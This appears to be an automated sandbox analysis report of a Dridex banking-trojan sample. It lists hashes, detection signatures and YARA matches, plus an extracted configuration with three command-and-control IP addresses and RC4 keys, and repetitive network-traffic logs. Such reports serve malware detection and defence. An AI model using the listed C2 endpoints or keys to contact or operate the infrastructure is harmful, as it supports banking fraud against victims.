Play interactive tour

Edit tour

Windows Analysis Report K9jgh4owKk.exe

Overview

General Information

Sample Name:	K9jgh4owKk.exe
Analysis ID:	546752
MD5:	a5eb3426e582795b6393a328cd27bf94
SHA1:	a2494b972f175cadc7e3b43d67af4c7f7efebb19
SHA256:	67dd305f6e4cdfaa395ca06f30d971b8a0d4bf3926bfb140b258f0704b31f92b
Tags:	Dridexexe
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected Dridex e-Banking trojan

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to query network adapater information

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

K9jgh4owKk.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\K9jgh4owKk.exe" MD5: A5EB3426E582795B6393A328CD27BF94)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10111, "C2 list": ["103.9.36.172:443", "103.70.29.126:593", "46.101.175.170:10172"], "RC4 keys": ["CisvU52kuCqMOp5DJVJjX7NpSOgbFn5Z", "BuEjfhtq8TjhQNb5njPJFUKys2hxPATu0lv0D3Dehj6DP2DBu0bINeCHPnMKWBGwRiks5KDBnA"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.512470585.00000000022B0000.00000040.00000001.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.K9jgh4owKk.exe.400000.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.K9jgh4owKk.exe.400000.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.K9jgh4owKk.exe.22b0000.1.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.K9jgh4owKk.exe.22b0000.1.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.K9jgh4owKk.exe.400000.0.unpack

Malware Configuration Extractor: Dridex {"Version": 10111, "C2 list": ["103.9.36.172:443", "103.70.29.126:593", "46.101.175.170:10172"], "RC4 keys": ["CisvU52kuCqMOp5DJVJjX7NpSOgbFn5Z", "BuEjfhtq8TjhQNb5njPJFUKys2hxPATu0lv0D3Dehj6DP2DBu0bINeCHPnMKWBGwRiks5KDBnA"]}

Multi AV Scanner detection for submitted file

Show sources

Source: K9jgh4owKk.exe	Virustotal: Detection: 60%	Perma Link
Source: K9jgh4owKk.exe	Metadefender: Detection: 25%	Perma Link
Source: K9jgh4owKk.exe	ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample

Show sources

Source: K9jgh4owKk.exe

Avira: detected

Machine Learning detection for sample

Show sources

Source: K9jgh4owKk.exe

Joe Sandbox ML: detected

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Unpacked PE file: 0.2.K9jgh4owKk.exe.400000.0.unpack

Source: K9jgh4owKk.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 103.9.36.172:443 -> 192.168.2.7:49757 version: TLS 1.2

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_0042CEF8 FindFirstFileExW,

0_2_0042CEF8

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 103.9.36.172:443
Source: Malware configuration extractor	IPs: 103.70.29.126:593
Source: Malware configuration extractor	IPs: 46.101.175.170:10172

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache

Source: global traffic	TCP traffic: 192.168.2.7:49758 -> 103.70.29.126:593
Source: global traffic	TCP traffic: 192.168.2.7:49760 -> 46.101.175.170:10172

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:51:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:52:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.0.15Date: Fri, 31 Dec 2021 08:53:17 GMTContent-Type: text/plain; charset=utf-8Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.175.170
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.9.36.172
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126
Source: unknown	TCP traffic detected without corresponding DNS query: 103.70.29.126

Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.249960607.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.251751071.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: K9jgh4owKk.exe, 00000000.00000003.254942420.00000000030CE000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: K9jgh4owKk.exe, 00000000.00000003.254942420.00000000030CE000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/#4
Source: K9jgh4owKk.exe, 00000000.00000003.254942420.00000000030CE000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/14h)1
